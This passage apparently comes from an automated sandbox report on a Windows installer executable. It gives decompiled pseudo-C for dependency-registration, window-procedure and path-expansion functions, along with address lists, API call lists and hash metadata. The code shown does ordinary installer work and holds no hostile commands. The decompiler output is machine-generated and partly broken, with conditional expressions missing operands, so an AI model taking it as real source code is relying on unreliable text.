					_t28 = DefWindowProcW(_t41, 0x82, _a12, _t45);
					SetWindowLongW(_t41, 0xffffffeb, 0);
					return _t28;
				}
				if(_t39 != _t16) {
					goto L8;
				}
				return _t16;
			}














                                                                                                                                                                  0x00417381
                                                                                                                                                                  0x00417390
                                                                                                                                                                  0x00417394
                                                                                                                                                                  0x00417395
                                                                                                                                                                  0x00417398
                                                                                                                                                                  0x0041739a
                                                                                                                                                                  0x00417445
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041744b
                                                                                                                                                                  0x004173a0
                                                                                                                                                                  0x004173a3
                                                                                                                                                                  0x00417407
                                                                                                                                                                  0x0041740a
                                                                                                                                                                  0x0041742c
                                                                                                                                                                  0x00417434
                                                                                                                                                                  0x00417437
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00417440
                                                                                                                                                                  0x004173a5
                                                                                                                                                                  0x004173a8
                                                                                                                                                                  0x004173ab
                                                                                                                                                                  0x004173df
                                                                                                                                                                  0x004173e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004173ed
                                                                                                                                                                  0x004173ad
                                                                                                                                                                  0x004173ae
                                                                                                                                                                  0x004173c3
                                                                                                                                                                  0x004173d0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004173d6
                                                                                                                                                                  0x004173b2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00417387
                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 004173C3
                                                                                                                                                                  • SetWindowLongW.USER32 ref: 004173D0
                                                                                                                                                                  • SetWindowLongW.USER32 ref: 004173DF
                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004173ED
                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 004173F9
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041740A
                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041742C
                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00417434
                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00417437
                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00417445
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 409979828-0
                                                                                                                                                                  • Opcode ID: 640383b95517aa4f642cd817275df925215976194df71561c2fd0b8f14f38a61
                                                                                                                                                                  • Instruction ID: d478885b45acd630aaf25a92bd141296722ee0d303334c6fe2100d93c51215e4
                                                                                                                                                                  • Opcode Fuzzy Hash: 640383b95517aa4f642cd817275df925215976194df71561c2fd0b8f14f38a61
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E21FF32104218BFCB145F64DC4CEBB3FB8EF49720B05952AFB22861B0D7308840EBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D4B9, Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 297COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E0040D4B9(signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int* _a24) {
				char _v8;
				int _v12;
				char _v16;
				int _v20;
				intOrPtr* _v24;
				void* __edi;
				int _t107;
				short* _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t119;
				signed int _t126;
				short* _t127;
				signed int _t131;
				signed int _t132;
				signed int _t139;
				intOrPtr* _t147;
				signed int* _t148;
				signed int _t149;
				intOrPtr _t152;
				signed int _t154;
				signed int* _t157;
				signed int _t159;
				signed int _t160;
				signed int _t163;
				signed int _t164;
				int _t165;
				signed int _t166;
				void* _t167;

				_t147 = _a4;
				_t163 = _a8;
				_t107 = 1;
				 *((intOrPtr*)(_t147 + 0x10)) = 1;
				_t164 = 0;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				if( *((intOrPtr*)(_t163 + 8)) == 0 && _a12 != 4) {
					_t107 = 0;
				}
				 *((intOrPtr*)(_t147 + 0x18)) = _t107;
				 *(_t147 + 0x1c) = 0;
				_t148 =  *(_t163 + 0x40);
				if(_t148 != 0) {
					__eflags =  *_t148;
					_t109 =  !=  ? _t148 : 0;
				} else {
					_t109 =  *(_t163 + 0xc);
				}
				_a4 = _t109;
				if( *_t147 != 3) {
					__eflags =  *(_t163 + 0x28);
					if(__eflags != 0) {
						L43:
						_v20 = 1;
						L44:
						_t110 = E004369F6(_t148, _t163, __eflags,  *((intOrPtr*)(_t163 + 0x54)), 0);
						__eflags = _t110;
						if(_t110 == 0) {
							L47:
							 *(_t147 + 0x14) =  *(_t147 + 0x14) | 0x00000003;
							L50:
							 *(_t147 + 0x14) =  *(_t147 + 0x14) | 0x00000004;
							_t149 = 0;
							 *(_t147 + 0x38) = 1;
							_a20 = 0;
							__eflags =  *(_t163 + 0xb8);
							if( *(_t163 + 0xb8) <= 0) {
								L60:
								_t111 = _a4;
								__eflags = _t111;
								if(_t111 == 0) {
									goto L67;
								}
								__eflags =  *(_t163 + 0x40);
								if( *(_t163 + 0x40) != 0) {
									L63:
									__eflags = E0041E9E9(_t163, _t111);
									if(__eflags != 0) {
										goto L67;
									}
									_t164 = E0040BC29(__eflags, _t147, 1, _a4,  *(_t163 + 0xc));
									__eflags = _t164;
									if(_t164 >= 0) {
										goto L67;
									}
									_push("Failed to add registration action for self dependent.");
									goto L66;
								}
								__eflags = _v20;
								if(_v20 != 0) {
									goto L67;
								}
								goto L63;
							}
							_t157 = 0;
							__eflags = 0;
							_a24 = 0;
							do {
								_t119 =  *((intOrPtr*)(_t163 + 0xb4)) + _t157;
								_a16 = _t119;
								__eflags =  *_t119 - 5;
								if( *_t119 != 5) {
									goto L59;
								}
								_a8 = _a8 & 0x00000000;
								__eflags =  *(_t119 + 0xa0);
								if( *(_t119 + 0xa0) <= 0) {
									goto L59;
								}
								_t152 = 0;
								__eflags = 0;
								_a12 = 0;
								do {
									_v24 =  *((intOrPtr*)(_t119 + 0x9c)) + _t152;
									__eflags = E0041E9E9(_t163,  *( *((intOrPtr*)(_t119 + 0x9c)) + _t152));
									if(__eflags != 0) {
										goto L57;
									}
									_t164 = E0040BC29(__eflags, _t147, 1,  *_v24,  *((intOrPtr*)(_a16 + 0x18)));
									__eflags = _t164;
									if(_t164 < 0) {
										_push("Failed to add registration action for dependent related bundle.");
										goto L66;
									}
									L57:
									_t119 = _a16;
									_t159 = _a8 + 1;
									_t152 = _a12 + 0x10;
									_a8 = _t159;
									_a12 = _t152;
									__eflags = _t159 -  *(_t119 + 0xa0);
								} while (_t159 <  *(_t119 + 0xa0));
								_t149 = _a20;
								_t157 = _a24;
								L59:
								_t149 = _t149 + 1;
								_t157 = _t157 + 0xe8;
								_a20 = _t149;
								_a24 = _t157;
								__eflags = _t149 -  *(_t163 + 0xb8);
							} while (_t149 <  *(_t163 + 0xb8));
							goto L60;
						}
						__eflags =  *_t147 - 6;
						if( *_t147 != 6) {
							goto L50;
						}
						_t126 = E00413062();
						__eflags = _t126;
						if(_t126 != 0) {
							__eflags =  *_t147 - 6;
							if( *_t147 == 6) {
								_t66 = _t147 + 0x14;
								 *_t66 =  *(_t147 + 0x14) | 0x00000002;
								__eflags =  *_t66;
							}
							goto L50;
						}
						goto L47;
					}
					_v20 = 0;
					__eflags =  *(_t163 + 0x30);
					if(__eflags == 0) {
						goto L44;
					}
					goto L43;
				} else {
					_t127 =  *(_t163 + 0xbc);
					_t165 = 2;
					if(_t127 == 0 || CompareStringW(0, 1,  *(_t163 + 0xc), 0xffffffff, _t127, 0xffffffff) != _t165) {
						_push( *(_t163 + 0xbc));
						E00402003(_t165, 0xa00000d1,  *((intOrPtr*)(_t163 + 0x44)));
						_t167 = _t167 + 0x10;
					} else {
						 *(_t147 + 0x38) = _t165;
					}
					_t164 = E00437EE1( &_v8, 5, 1);
					if(_t164 >= 0) {
						_t131 = _a4;
						__eflags = _t131;
						if(_t131 == 0) {
							L19:
							__eflags = _a16 - 2;
							if(_a16 == 2) {
								goto L67;
							}
							_t132 = _a20;
							_t166 = 0;
							__eflags = _t132;
							if(_t132 == 0) {
								L25:
								_t154 = _t166;
								_a12 = _t154;
								__eflags =  *(_t163 + 0xb8) - _t166;
								if( *(_t163 + 0xb8) <= _t166) {
									L34:
									_t164 = E00438CE4(_t154,  *((intOrPtr*)(_t163 + 0x4c)),  *((intOrPtr*)(_t163 + 0x44)), _t166, _v8,  &_v16,  &_v12);
									__eflags = _t164 - 0x80070002;
									if(_t164 != 0x80070002) {
										__eflags = _t164;
										if(_t164 < 0) {
											_push("Failed to check for remaining dependents during planning.");
											goto L66;
										}
										__eflags = _v12;
										if(_v12 != 0) {
											 *(_t147 + 0x1c) = 1;
											 *_a24 =  *_a24 & 0x00000000;
											E00402003(2, 0xa00000d2, _v12);
										}
										goto L67;
									}
									_t164 = 0;
									goto L67;
								}
								_t160 = _t166;
								_a16 = _t166;
								do {
									_t139 =  *((intOrPtr*)(_t163 + 0xb4)) + _t160;
									_a20 = _t139;
									__eflags =  *_t139 - 5;
									if( *_t139 != 5) {
										goto L33;
									}
									_a4 = _t166;
									__eflags =  *((intOrPtr*)(_t139 + 0xa0)) - _t166;
									if( *((intOrPtr*)(_t139 + 0xa0)) <= _t166) {
										goto L33;
									}
									_t161 = _t166;
									_a8 = _t166;
									while(1) {
										_t164 = E0041E934(_t154, _v8,  *((intOrPtr*)( *((intOrPtr*)(_t139 + 0x9c)) + _t161)));
										__eflags = _t164;
										if(_t164 < 0) {
											break;
										}
										_t139 = _a20;
										_t154 = _a4 + 1;
										_t161 = _a8 + 0x10;
										_a4 = _t154;
										_a8 = _a8 + 0x10;
										__eflags = _t154 -  *((intOrPtr*)(_t139 + 0xa0));
										if(_t154 <  *((intOrPtr*)(_t139 + 0xa0))) {
											continue;
										}
										_t154 = _a12;
										_t160 = _a16;
										_t166 = 0;
										__eflags = 0;
										goto L33;
									}
									_push("Failed to add dependent bundle provider key to ignore dependents.");
									goto L66;
									L33:
									_t154 = _t154 + 1;
									_t160 = _t160 + 0xe8;
									_a12 = _t154;
									_a16 = _t160;
									__eflags = _t154 -  *(_t163 + 0xb8);
								} while (_t154 <  *(_t163 + 0xb8));
								goto L34;
							}
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L25;
							}
							_t164 = E0041E934(_t148, _v8, _t132);
							__eflags = _t164;
							if(_t164 >= 0) {
								_t166 = 0;
								__eflags = 0;
								goto L25;
							}
							_push("Failed to add dependents ignored from command-line.");
							goto L66;
						}
						__eflags = E0041E9E9(_t163, _t131);
						if(__eflags == 0) {
							goto L19;
						}
						_t164 = E0040BC29(__eflags, _t147, 2, _a4,  *(_t163 + 0xc));
						__eflags = _t164;
						if(_t164 >= 0) {
							_t164 = E0041E934(_t148, _v8, _a4);
							__eflags = _t164;
							if(_t164 >= 0) {
								goto L19;
							}
							_push("Failed to add self-dependent to ignore dependents.");
							goto L66;
						}
						_push("Failed to allocate registration action.");
						goto L66;
					} else {
						_push("Failed to create the string dictionary.");
						L66:
						_push(_t164);
						E00430A57();
						L67:
						if(_v8 != 0) {
							E0043800C(_t163, _v8);
						}
						if(_v16 != 0) {
							E00438EA2(_v16, _v12);
						}
						return _t164;
					}
				}
			}
































                                                                                                                                                                  0x0040d4c0
                                                                                                                                                                  0x0040d4c9
                                                                                                                                                                  0x0040d4cc
                                                                                                                                                                  0x0040d4cd
                                                                                                                                                                  0x0040d4d0
                                                                                                                                                                  0x0040d4d2
                                                                                                                                                                  0x0040d4d5
                                                                                                                                                                  0x0040d4d8
                                                                                                                                                                  0x0040d4de
                                                                                                                                                                  0x0040d4e6
                                                                                                                                                                  0x0040d4e6
                                                                                                                                                                  0x0040d4e8
                                                                                                                                                                  0x0040d4eb
                                                                                                                                                                  0x0040d4ee
                                                                                                                                                                  0x0040d4f3
                                                                                                                                                                  0x0040d4fa
                                                                                                                                                                  0x0040d4ff
                                                                                                                                                                  0x0040d4f5
                                                                                                                                                                  0x0040d4f5
                                                                                                                                                                  0x0040d4f5
                                                                                                                                                                  0x0040d505
                                                                                                                                                                  0x0040d508
                                                                                                                                                                  0x0040d6d6
                                                                                                                                                                  0x0040d6d9
                                                                                                                                                                  0x0040d6e3
                                                                                                                                                                  0x0040d6e3
                                                                                                                                                                  0x0040d6ea
                                                                                                                                                                  0x0040d6ee
                                                                                                                                                                  0x0040d6f3
                                                                                                                                                                  0x0040d6f5
                                                                                                                                                                  0x0040d705
                                                                                                                                                                  0x0040d705
                                                                                                                                                                  0x0040d714
                                                                                                                                                                  0x0040d714
                                                                                                                                                                  0x0040d718
                                                                                                                                                                  0x0040d71a
                                                                                                                                                                  0x0040d721
                                                                                                                                                                  0x0040d724
                                                                                                                                                                  0x0040d72a
                                                                                                                                                                  0x0040d7c5
                                                                                                                                                                  0x0040d7c5
                                                                                                                                                                  0x0040d7c8
                                                                                                                                                                  0x0040d7ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d7cc
                                                                                                                                                                  0x0040d7d0
                                                                                                                                                                  0x0040d7d8
                                                                                                                                                                  0x0040d7df
                                                                                                                                                                  0x0040d7e1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d7f1
                                                                                                                                                                  0x0040d7f3
                                                                                                                                                                  0x0040d7f5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d7f7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d7f7
                                                                                                                                                                  0x0040d7d2
                                                                                                                                                                  0x0040d7d6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d7d6
                                                                                                                                                                  0x0040d730
                                                                                                                                                                  0x0040d730
                                                                                                                                                                  0x0040d732
                                                                                                                                                                  0x0040d735
                                                                                                                                                                  0x0040d73b
                                                                                                                                                                  0x0040d73d
                                                                                                                                                                  0x0040d740
                                                                                                                                                                  0x0040d743
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d745
                                                                                                                                                                  0x0040d749
                                                                                                                                                                  0x0040d750
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d752
                                                                                                                                                                  0x0040d752
                                                                                                                                                                  0x0040d754
                                                                                                                                                                  0x0040d757
                                                                                                                                                                  0x0040d75f
                                                                                                                                                                  0x0040d76a
                                                                                                                                                                  0x0040d76c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d781
                                                                                                                                                                  0x0040d783
                                                                                                                                                                  0x0040d785
                                                                                                                                                                  0x0040d82c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d82c
                                                                                                                                                                  0x0040d78b
                                                                                                                                                                  0x0040d791
                                                                                                                                                                  0x0040d794
                                                                                                                                                                  0x0040d795
                                                                                                                                                                  0x0040d798
                                                                                                                                                                  0x0040d79b
                                                                                                                                                                  0x0040d79e
                                                                                                                                                                  0x0040d79e
                                                                                                                                                                  0x0040d7a6
                                                                                                                                                                  0x0040d7a9
                                                                                                                                                                  0x0040d7ac
                                                                                                                                                                  0x0040d7ac
                                                                                                                                                                  0x0040d7ad
                                                                                                                                                                  0x0040d7b3
                                                                                                                                                                  0x0040d7b6
                                                                                                                                                                  0x0040d7b9
                                                                                                                                                                  0x0040d7b9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d735
                                                                                                                                                                  0x0040d6f7
                                                                                                                                                                  0x0040d6fa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d6fc
                                                                                                                                                                  0x0040d701
                                                                                                                                                                  0x0040d703
                                                                                                                                                                  0x0040d70b
                                                                                                                                                                  0x0040d70e
                                                                                                                                                                  0x0040d710
                                                                                                                                                                  0x0040d710
                                                                                                                                                                  0x0040d710
                                                                                                                                                                  0x0040d710
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d70e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d703
                                                                                                                                                                  0x0040d6db
                                                                                                                                                                  0x0040d6de
                                                                                                                                                                  0x0040d6e1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d50e
                                                                                                                                                                  0x0040d50e
                                                                                                                                                                  0x0040d516
                                                                                                                                                                  0x0040d519
                                                                                                                                                                  0x0040d535
                                                                                                                                                                  0x0040d544
                                                                                                                                                                  0x0040d549
                                                                                                                                                                  0x0040d530
                                                                                                                                                                  0x0040d530
                                                                                                                                                                  0x0040d530
                                                                                                                                                                  0x0040d559
                                                                                                                                                                  0x0040d55d
                                                                                                                                                                  0x0040d569
                                                                                                                                                                  0x0040d56c
                                                                                                                                                                  0x0040d56e
                                                                                                                                                                  0x0040d5b4
                                                                                                                                                                  0x0040d5b4
                                                                                                                                                                  0x0040d5b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5be
                                                                                                                                                                  0x0040d5c1
                                                                                                                                                                  0x0040d5c3
                                                                                                                                                                  0x0040d5c5
                                                                                                                                                                  0x0040d5e7
                                                                                                                                                                  0x0040d5e7
                                                                                                                                                                  0x0040d5e9
                                                                                                                                                                  0x0040d5ec
                                                                                                                                                                  0x0040d5f2
                                                                                                                                                                  0x0040d668
                                                                                                                                                                  0x0040d67f
                                                                                                                                                                  0x0040d681
                                                                                                                                                                  0x0040d687
                                                                                                                                                                  0x0040d69a
                                                                                                                                                                  0x0040d69c
                                                                                                                                                                  0x0040d6cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d6cc
                                                                                                                                                                  0x0040d69e
                                                                                                                                                                  0x0040d6a2
                                                                                                                                                                  0x0040d6b3
                                                                                                                                                                  0x0040d6ba
                                                                                                                                                                  0x0040d6bf
                                                                                                                                                                  0x0040d6c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d6a2
                                                                                                                                                                  0x0040d689
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d689
                                                                                                                                                                  0x0040d5f4
                                                                                                                                                                  0x0040d5f6
                                                                                                                                                                  0x0040d5f9
                                                                                                                                                                  0x0040d5ff
                                                                                                                                                                  0x0040d601
                                                                                                                                                                  0x0040d604
                                                                                                                                                                  0x0040d607
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d609
                                                                                                                                                                  0x0040d60c
                                                                                                                                                                  0x0040d612
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d614
                                                                                                                                                                  0x0040d616
                                                                                                                                                                  0x0040d619
                                                                                                                                                                  0x0040d62a
                                                                                                                                                                  0x0040d62c
                                                                                                                                                                  0x0040d62e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d636
                                                                                                                                                                  0x0040d639
                                                                                                                                                                  0x0040d63a
                                                                                                                                                                  0x0040d63d
                                                                                                                                                                  0x0040d640
                                                                                                                                                                  0x0040d643
                                                                                                                                                                  0x0040d649
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d64b
                                                                                                                                                                  0x0040d64e
                                                                                                                                                                  0x0040d651
                                                                                                                                                                  0x0040d651
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d651
                                                                                                                                                                  0x0040d690
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d653
                                                                                                                                                                  0x0040d653
                                                                                                                                                                  0x0040d654
                                                                                                                                                                  0x0040d65a
                                                                                                                                                                  0x0040d65d
                                                                                                                                                                  0x0040d660
                                                                                                                                                                  0x0040d660
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5f9
                                                                                                                                                                  0x0040d5c7
                                                                                                                                                                  0x0040d5ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5d5
                                                                                                                                                                  0x0040d5d7
                                                                                                                                                                  0x0040d5d9
                                                                                                                                                                  0x0040d5e5
                                                                                                                                                                  0x0040d5e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5e5
                                                                                                                                                                  0x0040d5db
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5db
                                                                                                                                                                  0x0040d577
                                                                                                                                                                  0x0040d579
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d589
                                                                                                                                                                  0x0040d58b
                                                                                                                                                                  0x0040d58d
                                                                                                                                                                  0x0040d5a4
                                                                                                                                                                  0x0040d5a6
                                                                                                                                                                  0x0040d5a8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5aa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d5aa
                                                                                                                                                                  0x0040d58f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040d55f
                                                                                                                                                                  0x0040d55f
                                                                                                                                                                  0x0040d7fc
                                                                                                                                                                  0x0040d7fc
                                                                                                                                                                  0x0040d7fd
                                                                                                                                                                  0x0040d804
                                                                                                                                                                  0x0040d808
                                                                                                                                                                  0x0040d80d
                                                                                                                                                                  0x0040d80d
                                                                                                                                                                  0x0040d816
                                                                                                                                                                  0x0040d81e
                                                                                                                                                                  0x0040d81e
                                                                                                                                                                  0x0040d829
                                                                                                                                                                  0x0040d829
                                                                                                                                                                  0x0040d55d

                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000000,000003D8,000000F8,00401414,0000001C,000003BC,00401414,00000088,000003D8), ref: 0040D526
                                                                                                                                                                    • Part of subcall function 0041E934: _wcstok_s.LIBCMT ref: 0041E98B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add registration action for dependent related bundle., xrefs: 0040D82C
                                                                                                                                                                  • Failed to allocate registration action., xrefs: 0040D58F
                                                                                                                                                                  • Failed to add dependent bundle provider key to ignore dependents., xrefs: 0040D690
                                                                                                                                                                  • Failed to add dependents ignored from command-line., xrefs: 0040D5DB
                                                                                                                                                                  • Failed to check for remaining dependents during planning., xrefs: 0040D6CC
                                                                                                                                                                  • Failed to add self-dependent to ignore dependents., xrefs: 0040D5AA
                                                                                                                                                                  • Failed to add registration action for self dependent., xrefs: 0040D7F7
                                                                                                                                                                  • Failed to create the string dictionary., xrefs: 0040D55F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString_wcstok_s
                                                                                                                                                                  • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.
                                                                                                                                                                  • API String ID: 3211832249-2086987450
                                                                                                                                                                  • Opcode ID: 366cac60d26e291b0a2ca474d1c170624252b26210ad294aeaebd45d04011d41
                                                                                                                                                                  • Instruction ID: 3067b0948dbd99f72626e9a012b4f8fade437f4d009733a30f543e73a2686259
                                                                                                                                                                  • Opcode Fuzzy Hash: 366cac60d26e291b0a2ca474d1c170624252b26210ad294aeaebd45d04011d41
                                                                                                                                                                  • Instruction Fuzzy Hash: E1B1CE71E00215EBDF19DF95CC81BAABBA0BF44314F10813BF814AB291D778D994CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043191F, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 204COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E0043191F(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _t49;
				long _t57;
				void* _t63;
				signed short _t65;
				signed short _t66;
				long _t69;
				signed short _t77;
				signed short _t78;
				WCHAR* _t79;
				long _t81;
				long _t84;
				long _t85;
				long _t87;
				void* _t88;

				_t79 = _a8;
				_t49 = 0;
				_v12 = _v12 & 0;
				_t81 = 0;
				_v8 = 0;
				_v16 = 0;
				_t84 = 0x40;
				if((_a12 & 0x00000001) == 0) {
					L15:
					if((_a12 & 0x00000002) == 0) {
						_v8 = _v8 & 0x00000000;
						_v12 = _t49;
						goto L31;
					} else {
						_a12 = _a12 & 0x00000000;
						_t83 =  !=  ? _t49 : _t79;
						_t85 =  >  ? _t81 : _t84;
						_a8 =  !=  ? _t49 : _t79;
						_t88 = E00433BDF( &_v12, _t85);
						if(_t88 >= 0) {
							_t57 = GetFullPathNameW(_a8, _t85, _v12,  &_a12);
							if(_t57 != 0) {
								if(_t85 >= _t57) {
									L27:
									if(_t57 <= 0x104) {
										L29:
										_t49 = _v12;
										L31:
										_t80 =  !=  ? _t49 : _t79;
										_t88 = E00433F88(_a4,  !=  ? _t49 : _t79, 0);
									} else {
										_t88 = E00431D67( &_v12);
										if(_t88 >= 0) {
											goto L29;
										}
									}
								} else {
									_t34 = _t57 + 7; // 0x7
									_t87 =  <  ? _t57 : _t34;
									_t88 = E00433BDF( &_v12, _t87);
									if(_t88 >= 0) {
										_t57 = GetFullPathNameW(_a8, _t87, _v12,  &_a12);
										if(_t57 != 0) {
											if(_t87 >= _t57) {
												goto L27;
											} else {
												_t63 = 0x8007007a;
												_push(0x8007007a);
												_push(0x133);
												goto L25;
											}
										} else {
											_t65 = GetLastError();
											_t91 =  <=  ? _t65 : _t65 & 0x0000ffff | 0x80070000;
											_t63 = 0x80004005;
											_t88 =  >=  ? 0x80004005 :  <=  ? _t65 : _t65 & 0x0000ffff | 0x80070000;
											_push(_t88);
											_push(0x12e);
											goto L26;
										}
									}
								}
							} else {
								_t66 = GetLastError();
								_t94 =  <=  ? _t66 : _t66 & 0x0000ffff | 0x80070000;
								_t63 = 0x80004005;
								_t88 =  >=  ? 0x80004005 :  <=  ? _t66 : _t66 & 0x0000ffff | 0x80070000;
								_push(_t88);
								_push(0x123);
								goto L26;
							}
						}
					}
				} else {
					_v16 = _t84;
					_t88 = E00433BDF( &_v8, _t84);
					if(_t88 >= 0) {
						_t69 = ExpandEnvironmentStringsW(_t79, _v8, _v16);
						if(_t69 != 0) {
							_t81 = _v16;
							if(_t81 >= _t69) {
								L10:
								if(_t69 <= 0x104) {
									L14:
									_t49 = _v8;
									goto L15;
								} else {
									_t88 =  ==  ? 0 : E00431D67( &_v8);
									if(_t88 >= 0) {
										_t88 = E0043452E(_v8,  &_v16);
										if(_t88 >= 0) {
											_t81 = _v16;
											goto L14;
										}
									}
								}
							} else {
								_v16 = _t69;
								_t88 = E00433BDF( &_v8, _t69);
								if(_t88 >= 0) {
									_t69 = ExpandEnvironmentStringsW(_t79, _v8, _v16);
									if(_t69 != 0) {
										_t81 = _v16;
										if(_t81 >= _t69) {
											goto L10;
										} else {
											_t63 = 0x8007007a;
											_push(0x8007007a);
											_push(0x102);
											L25:
											_t88 = _t63;
											goto L26;
										}
									} else {
										_t77 = GetLastError();
										_t98 =  <=  ? _t77 : _t77 & 0x0000ffff | 0x80070000;
										_t63 = 0x80004005;
										_t88 =  >=  ? 0x80004005 :  <=  ? _t77 : _t77 & 0x0000ffff | 0x80070000;
										_push(_t88);
										_push(0xfd);
										goto L26;
									}
								}
							}
						} else {
							_t78 = GetLastError();
							_t101 =  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
							_t63 = 0x80004005;
							_t88 =  >=  ? 0x80004005 :  <=  ? _t78 : _t78 & 0x0000ffff | 0x80070000;
							_push(_t88);
